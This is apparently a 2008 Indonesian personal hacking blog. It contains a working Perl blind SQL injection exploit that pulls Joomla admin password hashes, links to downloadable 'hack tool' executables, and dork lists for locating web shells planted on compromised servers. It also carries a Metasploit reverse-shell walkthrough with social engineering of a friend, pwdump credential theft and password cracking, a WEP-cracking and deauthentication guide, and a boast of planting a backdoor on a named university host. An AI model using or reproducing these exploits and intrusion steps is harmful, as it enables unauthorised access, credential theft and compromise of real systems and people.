tul lagi neeh
aio
hack & destroy tahun 2007, mang udah lama sich, tapi inget kenangan masa lampau
http://rapidshare.com/files/138241776/hack_destroy.exe
sorry nggak ada screenshot, yud1z lagi malez soalnya udah nggak punya kerjaan
Aug
18
Hacking Joomla Component “EZ Store”
posted by: yud1z in Computer on 08 18th, 2008 | | 1 Comment »
hajar jooomla neeh, pake teknik Remote Blind SQL Injection Exploit, trus tinggal compile deh
#!/usr/bin/perl
#Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid."
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ################################################################\n";
print " # Joomla Component EZ Store Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.dz-secure.com #\n";
print " # #\n";
print " # Dork: inurl:com_ezstore #\n";
print " # Usage: perl ezstore.pl host path <options> #\n";
print " # Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -t Valid procuct id #\n";
print " # -c Category value of the following product id #\n";
print " ################################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $cid = $ARGV[2];
my $pid = $ARGV[3];
my %options = ();
GetOptions(\%options, "c=i", "x=s", "p=i");
print "[~] Exploiting...\n";
if($options{"c"})
{
$cid = $options{"c"};
}
if($options{"p"})
{
$pid = $options{"p"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $cid, $pid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $cid, $pid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $cid = shift;
my $pid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
if($options{"x"})
{
$ua->proxy('http', "http://".$options{"x"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "viewcategory&catid=".$cid."";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-08-03]
Aug
16
donlot di rapidshare
posted by: yud1z in Computer on 08 16th, 2008 | | 2 Comments »
buat yang bingung cara donlot rapidshare
ada rapidleech neeh
http://www.christopheracademy.com/images/.system/kambe username : kambe password : newbee
Aug
12
hack tool 2008
posted by: yud1z in Computer on 08 12th, 2008 | | 1 Comment »
hackerz tool nih gw bind sendiri
http://rapidshare.com/files/136695327/yud1z_hacktool_2008.exe.html
passs : tigatiga
Aug
10
list shell backdoor baru lagi
posted by: yud1z in Computer on 08 10th, 2008 | | 3 Comments »
33 28.45% powered by captain crunch security team
6 5.17% safe-mode: off (not secure)
5 4.31% home
4 3.45% basel 2.2
4 3.45% safe-mode: off (not secure) drwxrwxrwx
3 2.59% c99memoryl
3 2.59% c99shell [file on secure ok ]
3 2.59% c99shell v. 1.0 pre-release build #16
3 2.59% hacker
3 2.59% uid=99(nobody) gid=99(nobody) groups=99(nobody)
2 1.72% --[ c99shell v. 1.0 pre-release build #16
2 1.72% basel
2 1.72% c99shell v. 1.0 pre-release build
2 1.72% powered by captain crunch security team | http://ccteam.ru |
2 1.72% safe-mode : off ( not secured ) drwxrwxrwx
2 1.72% safe-mode: off (not secure) drwxrwxrwx c99shell
1 0.86% !c99shell v. 1.0 pre-release build #16!
1 0.86% --[ c99shell v. 1.0 pre-release build
1 0.86% -[ c99shell v. 1.0 pre-release build #16 powered by captain cru
1 0.86% /opt/zope/lib/python/zdaemon/zdrun.py
1 0.86% allintext:â€safe-mode: off (not secure)â€
1 0.86% allinurl:selfremove
1 0.86% basel documentation
1 0.86% c99memory.php
1 0.86% c99shell safe-mode : off ( not secured ) drwxrwxrwx
1 0.86% c99shell v. 1.0 pre-release build #16 powered by captain crunch
1 0.86% c99shell v. 1.0 pre-release uname
1 0.86% c99shell v. pre-release build
1 0.86% captain crunch security team
1 0.86% code safe-mode: off (not secure) drwxrwxrwx c99shell
1 0.86% drwxrwxrwx c99shell filetype:php
1 0.86% encoder bind proc. ftp brute sec. sql php-code feedback self re
1 0.86% encoder tools proc. ftp brute sec. sql php-code update feedback
1 0.86% home updir search buffer tools proc ftp brute sec sql self remo
1 0.86% how to restore using !c99memory v. 1.0 pre-release build #16!
1 0.86% intext:c99memory v. 1.0
1 0.86% intext:safe-mode: off (not secure)
1 0.86% intext:safe-mode: off (not secure) tooling
1 0.86% inurl:act=sql
1 0.86% name asc. size · modify · owner/group · perms action
1 0.86% php safe-mode drwxrwxrwx
1 0.86% php4 timezone database
1 0.86% powered by captain crunch security team drwxrwxrwx
1 0.86% powered by captain crunch security team | http://ccteam.ru
1 0.86% safe mode: off ( not secure )
1 0.86% safe mode: off (not secure)
1 0.86% safe-mode: off (not secure) / tmp/ drwxrwxrwx
1 0.86% safe-mode: off (not secure) site:pt
1 0.86% shell powered by captain crunch security team
1 0.86% site:www.astro.mat.uc.pt basel
1 0.86% uid= gid= groups= sql uname -a
1 0.86% uid=99 ( nobody ) gid=99 ( nobody )
1 0.86% uid=99(nobody) gid=99(nobody) groups=99(nobody)safe-mode: off (
Aug
10
Surat Cinta Seorang Hacker
posted by: yud1z in Computer on 08 10th, 2008 | | 4 Comments »
Seandainya hatimu adalah sebuah system, maka aku akan scan kamu untuk mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku c:\> nc -l -o -v -e ke hatimu,tapi aku hanya berani ping di belakang anonymouse proxy, inikah rasanya jatuh cinta sehingga membuatku seperti pecundang atau aku memang pecundang sejati whatever!
Seandainya hatimu adalah sebuah system, ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?. apa aku harus pasang backdor “Remote Connect-Back Shell”jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.
Seandainya hatimu adalah sebuah system, saat semua request-ku diterima aku akan nogkrong terus di bugtraq untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry, dan menyeting error pagemu ” The page cannot be found Coz Has Been Owned by Someone get out!” aku janji gak bakalan ada macelinious program atau service yang hidden, karena aku sangat sayang dan mencintaimu.
Seandainya hatimu adalah sebuah system, jangan ada kata “You dont have permission to access it” untuk aku, kalau ga mau di ping flood Atau DDos Attack jangan ah….! kamu harus menjadi sang bidadari penyelamatku.
Seandainya hatimu adalah sebuah system, …?
Tapi sayang hatimu bukanlah sebuah system, kamu adalah sang bidadari impianku, yang telah mengacaukan systemku! Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat menangkalnya selain …kamu.
wekz……..
Aug
9
list shell backdoor
posted by: yud1z in Computer on 08 9th, 2008 | | 3 Comments »
shell c99 11 13.41% powered by captain crunch security team 6 7.32% locus7shell 4 4.88% shell 3 3.66% kuwait hacker 3 3.66% php safe-mode bypass (list directories): 3 3.66% safe-mode: off (not secure) 3 3.66% safe-mode: off (not secure) drwxrwxrwx c99shell 3 3.66% startpar -f 2 2.44% hs_kuwait.php 2 2.44% lejeune interpolate 2 2.44% name asc. size · modify · owner/group · perms action 2 2.44% shell c99 ccteam.r 1 1.22% .phpact=f shell 1 1.22% 00007458 zip 1 1.22% allintext:â€safe-mode: off (not secure) 1 1.22% allintitle: \locus7shell\ 1 1.22% allintitle: c99memoryl 1 1.22% allinurl:upload3.php 1 1.22% astro acrobat 1 1.22% basel 1 1.22% basel stellar library 1 1.22% c99memory 1 1.22% c99memoryl 1 1.22% c99shell v. 1.0 pre-release build #16 1 1.22% class-efem 1 1.22% efemerides del 22 de abril 1 1.22% encoder bind proc. ftp brute sec. sql php- 1 1.22% encoder bind proc. ftp brute sec. sql php-code feedback 1 1.22% encoder bind proc. ftp brute sec. sql php-code update feedback 1 1.22% encoder tools proc. ftp brute sec. sql php-code update feedback 1 1.22% filetype:php shell 1 1.22% foreach (array(sortsql_sort) as $v) 1 1.22% i.s.s.w team ... 1 1.22% intitle:locus7shell 1 1.22% inurl:ftpquickbrute 1 1.22% inurl:php drwxrwxr-x ftp brute sql 1 1.22% lejeune interpolation 1 1.22% lejuene interpolate 1 1.22% lmgrd_start 47 1 1.22% mysqld usage of cpu suse httpd2-prefork 1 1.22% php echo getenv 1 1.22% php4 “registered stream socket transports†1 1.22% powered by captain crunch filetype:php 1 1.22% powered by captain crunch security team drwxrwxrwx 1 1.22% powered by captain crunch security team | http://ccteam.ru | 1 1.22% safe mode : off (not secure) 1 1.22% safe-mode: 1 1.22% select action/file-type: 1 1.22% software make dir upload file safe-mode 1 1.22% uid=30(wwwrun) gid=8(www) lucos shell 64 24.81% locus7shell 31 12.02% intitle:locus7shell 12 4.65% locus7shell filetype:php 8 3.10% locus7shell uname 6 2.33% allintitle: locus7shell 5 1.94% - locus7shell 5 1.94% intitle:- locus7shell 5 1.94% x2300 locus7shell 4 1.55% --[ x2300 locus7shell v. 1.0a beta modded by #!physx^ | 4 1.55% allintitle:- locus7shell 4 1.55% intitle: - locus7shell 4 1.55% safe-mode: off (not secure) 3 1.16% locus7shell 2008 3 1.16% shell x2300 locus7shell 2 0.78% .br - locus7shell 2 0.78% .us/images/0/588/mo_656_656.swf 2 0.78% allintext:--[ x2300 locus7shell v. modded by #!physx^ 2 0.78% allintitle: - locus7shell 2 0.78% allintitle: locus7shell ext:php 2 0.78% allintitle:locus7shell 2 0.78% allintitle:locus7shell filetype:php 2 0.78% free locus7shell 2 0.78% ftp brute sec. sql php-code 2 0.78% inurl:act=sql 2 0.78% locus7s off secure 2 0.78% locus7s shell 2 0.78% locus7shell apache 2 0.78% locus7shell edition 2008 2 0.78% locus7shell filetype: 'php' 2 0.78% locus7shell index:php 2 0.78% locus7shell linux 2008 2 0.78% locus7shell modified 2 0.78% php safe-mode bypass (list directories): 2 0.78% safe-mode: off (not secure) drwxrwxrwx locus7shell 1 0.39% %%% locus7shell 1 0.39% - locus7shell windows 1 0.39% --[ x2300 locus7shell v. 1.0a beta modded by #!physx^ | www.loc 1 0.39% --[ x2300 locus7shell v. modded by #!physx^ | www.locus7s.com | 1 0.39% --[ x2300 locus7shell v.1.0a beta modded by #!physx^ | www.locu 1 0.39% /locus7shell/ 1 0.39% [enumerate] [encoder] [tools] [proc.] [ftp brute] [sec.] [sql] 1 0.39% allintext: locus7shell v. 1.0a beta 1 0.39% allintext:â€safe-mode: off (not secure)†1 0.39% allintitle: \locus7shell\ 1 0.39% allinurl: .phpact=ls 1 0.39% apache aix aixthread_scope 1 0.39% ar ba locus7shell 1 0.39% basel 1 0.39% basel 3.1 library 1 0.39% basel interpolation 1 0.39% basel interpolation engine 1 0.39% basel spectra 1 0.39% c99memoryl 1 0.39% encoder bind proc. ftp brute sec. sql php-code feedback self re 1 0.39% filetype locus7shell 1 0.39% interpolation engine 1 0.39% intext:'' safe-mode:off (not secure)'' 1 0.39% intitle:- locus7shell' 1 0.39% intitle:c99memoryl inurl:.php 1 0.39% intitle:locus7shell by filetype:php 1 0.39% intitle:locus7shell drwxr-xr-x 1 0.39% inurl:.phpact=ls 1 0.39% inurl:act intext:full hexdump 1 0.39% license.dat idl server bypass 1 0.39% locus7s uname 1 0.39% locus7shell 2.0 1 0.39% locus7shell [file on secure ok ] drwxrwxrwx 1 0.39% locus7shell intext:x2300 intext:milw0rm.it enumerate uname 1 0.39% locus7shell inurl:php 1 0.39% locus7shell linux 1 0.39% locus7shell linux 2006 1 0.39% locus7shell safe-mode: off (not secure) drwxrwxrwx 1 0.39% locus7shell self remove drwxrwxrwx 1 0.39% locus7shell v. 1.0 1 0.39% locus7shell windows 2008 1 0.39% locus7shell- 1 0.39% make dir make file ok read files locus7shell 1 0.39% modded locus7shell 1 0.39% php safe-mode bypass (list directories) 1 0.39% php safe-mode bypass (read file) 1 0.39% php safe-mode bypass (read files) 1 0.39% safe-mode: apache uname -a: linux filetype:php 1 0.39% safe-mode: off (not secure) / tmp/ drwxrwxrwx 1 0.39% safe-mode: off (not secure) locus7shell 1 0.39% safe_mode: off drwxr-xr-x locus7shell 1 0.39% software: safe-mode: off (not secure) your ip: - server ip: [ft 1 0.39% suhosin 5.1.2 1 0.39% sybase aixthread_scope 1 0.39% uploads/ drwxrwxrwx 1 0.39% warning kernel may be alerted using higher levels safe mode 1 0.39% x2300 locus7shell download 1 0.39% x2300 locus7shell modified by #!physx^ 1 0.39% x2300 locus7shell v. 1.0a 1 0.39% x2300 locus7shell v. 1.0a beta
Aug
8
vuln di UPT UI
posted by: yud1z in Computer on 08 8th, 2008 | | 5 Comments »
elooooo world
sekarang kita ngoprek kelemahan kompinya upt neeh yang bisa gratis dipake
langkah pertama scanning dulu yaaa…….
sediakan scanner kesukaan kamu, kalo gw sich suka pake look@lan karena kalo gw scanning lewat hotspot kena firewall kecuali port 22, 8080, sama 80
otomatis kita mesti pake kompi dalem tuk scannig, weks kaga bisa nginstall scanner, gampang ada beberapa alternatif
pertama = bawa linux, pake backtrack aja biar lebih ganteng, apa hubungannya………. . trus bootong lewat cd
kedua = klo males ato kaag bisa pake linux, ok kamu harus nyediain metasploit supaya bisa jadi admin
sekarang kita bahas pake metasploit degh
kita kutip dari blog lain supaya gw nggak cape ngetiknya
Pertama2 jalankan ‘mfsconsole’!
Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.
Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
Untuk melihat info dari exploit ini gunakan perintah :
msf > info ie_vml_rectfill
Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja 
).
Untuk menggunakan exploit gunakan perintah2 berikut dalam console :
msf > use_ie_vml_rectfill
msf > set PAYLOAD win32_reverse
msf > set RHOST ip_target
msf > set LHOST ip_penyerang
msf > exploit
Hasilnya akan tampak seperti gambar berikut :
Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus
Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.
Crack da Password!
Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!
Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :
Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah
C:\temp\Pwdump –o pass.txt 127.0.0.1
Klo berhasil akan tampak pada gambar berikut.
Lalu copy file pass.txt ke komputer kita
C:\temp\copy pass.txt z:
Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.
Nah, udah dapet hash file nya kan. Tinggal di crack aja deh….
Yosh!! password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.
Download John The Ripper untuk Windows disini. Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :
D:\john171w\john1701\run>john-mmx.exe pass.txt Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX]) REN123 (Administrator:2) TEBAK (coba:2) ADMINKE (Administrator:1) MUDAHDI (coba:1)
Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.
Administrator:1+Administrator:2 = adminkeren123
Sedangkan untuk user “coba” adalah “mudahditebak”!!
Mudah bukan? Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.
Nah, sekarang kalau kita mau pakai komputer teman di Lab, ga usah cari2 orangnnya lagi. Tinggal pake aja langsung user Admin lagi, tapi jangan sampai ketahuan ama dia….. 
Atau klo anda lupa password Administrator, tidak perlu mereboot komputer, lalu mereset password anda. Tinggal ikut langkah2 diatas aja!
kita asumsikan kita udah dapet pass untuk jadi admin
trus kita scan pake look@lan
keliatan deng………..
kita coba 1 yaitu 152.118.80.58
wekss …. ada nyanhg kebuka
telnetnya neghhhhh
wekekekekekekekek. klo gitu kita bisa konek pake telnet donk. yaiyalah masa ya iya donk mulan aja jamilah masa jami donk wekekeekekekeke.
ntar dulu. mungkin aneh klo kita melakukan aksi telnet di kompi perpus.
klo gitu kita pake kompi fib di gedung 8. gimana?
bisa donk.
berarti udah punya hak exploit terhadap kompi fib
oh ya gw aja sempet nanem backdoor
di http://152.118.80.125
wkwkwkwkwkwwkk
greeetz to:
yogyafree jakarta
modius
panther ranger crew
blackhat
Aug
8
Menjebol Proteksi WEP
posted by: yud1z in Computer on 08 8th, 2008 | | 3 Comments »
Alat yang kita butuhkan adalah :
- Sebuah Laptop
2.Sebuah Wireless Adapter yang mendukung Mode Monitoring dan Injection.
3.Linux Live CD distro : Backtrack 2.0
Mengapa kita membutuhkan Laptop ? Tentu saja karena akses HotSpot biasanya diberikan untuk pengguna yang Mobile. Dan dengan laptop kita memiliki fleksibilitas yang tinggi pula.
Lalu apa yang dimaksud dengan Wireless Adapter yang mendukung mode monitoring dan injection ? Perlu anda ketahui, tidak semua Wireless Adapter yang ada dipasaran, maupun yang sudah built in dalam laptop, mendukung mode monitoring dan injection yang diperlukan untuk WEP hacking ini.
Yang perlu anda perhatikan adalah Chip dari Wireless Adapter anda. Chip terbaik dalam melakukan wireless hacking adalah Atheros dan Ralink. Namun Atheros adalah pilihan utama. Tidak banyak wireless adapter yang memiliki chip atheros di Indonesia, anda dapat mencari beberapa merk dibawah ini :
- 3Com 3CRPAG175B
2.3Com 3CRXJK10075
3.DLINK DWL-G630 Rev C
4.Linksys WPC55AG
5.TrendNET TEW-441PC
6.TrendNET TEW-443PI
7.TP-LINK TL-WN610G
Jika anda telah memilikinya, maka anda dapat memulai Langkah pertama dalam Wireless Hacking ini 
yaitu lakukan booting dengan CD Backtrack anda .
Langkah kedua tentu saja, langsung buka console anda dan ketikkan command berikut(saya asumsikan wireless adapter anda berchipset atheros) :
airmon-ng stop ath0
airmon-ng start wifi0
Kedua command ini berguna untuk mengaktifkan mode monitoring dan injection pada wireless adapter anda. Kemudian lanjutkan dengan monitoring jaringan wireless dengan mengetikkan command berikut :
airodump-ng ath0
Akan tampil seluruh jaringan wireless yang terdeteksi seperti diatas. Tampak terlihat Access Point Rek-1 diproteksi dengan WEP Encryption. itulah korban kita. AP Rek-1 diset pada Channel 6 dan memiliki BSSID 00:19:5B:5C:62:92 . Sekarang saatnya melakukan penyerangan.Buka Console baru dan ketikkan :
airodump-ng –channel 6 –bssid 00:19:5B:5C:62:92 -w hasil ath0
Perintah diatas akan mengumpulkan paket data yang dibutuhan untuk proses Cracking.
Selanjutnya lakukan injeksi paket pada Client yang terkoneksi pada AP untuk mendapatkan paket ARP lebih cepat. Bukalah lagi Console baru tanpa menutup console yang sebelumnya dan ketik :
aireplay-ng –arpreplay -b 00:19:5B:5C:62:92 -h 00:19:D2:45:D0:EB ath0
Client yang diserang ini memiliki Mac address 00:19:D2:45:D0:EB (lihat pada screenshot diatas pada tabel station yang terletak dibawah) . Anda tidak menemukan Mac address 00:19:D2:45:D0:EB pada screenshot ? tentu saja karena saat dilakukan screenshot belum terdeteksi 
Tidak sabar menunggu ? Untuk mempercepat lagi datangnya ARP , maka kita dapat melakukan serangan Deauthentication untuk memutuskan hubungan Client ke AP sehingga ARP yang biasanya didapat saat awal koneksi client dapat lebih cepat didapat. Bukalah console baru sekali lagi dan ketikkan :
aireplay-ng –deauth 5 -c 00:19:D2:45:D0:EB -a 00:19:5B:5C:62:92 ath0
Hasil dari ketiga perintah ini dapat anda lihat pada screenshot dibawah ini :
I Like this Screenshot
Sampai sejauh ini anda telah melakukan pengumpulan paket yang dibutuhkan untuk menjebol WEP Keys. Langkah terakhir yang harus anda lakukan adalah buka console baru lagi dan ketikkan perintah berikut :
aircrack-ng hasil*.cap
atau apabila anda memiliki aircrack versi terbaru anda dapat juga mengetikkan perintah seperti berikut :
aircrack-ptw hasil-01.cap
Dan tunggulah beberapa menit hingga anda mendapatkan key tersebut Maaf Screenshot yang satu ini lupa saya buat, tapi yang pasti saya berhasil melakukannya dalam waktu 30 Menit dengan perintah aircrack-ptw hasil-01.cap .
Aug
7
Hello world!
posted by: yud1z in Computer on 08 7th, 2008 | | 2 Comments »
tempat yud1z bisa ngobrol neeh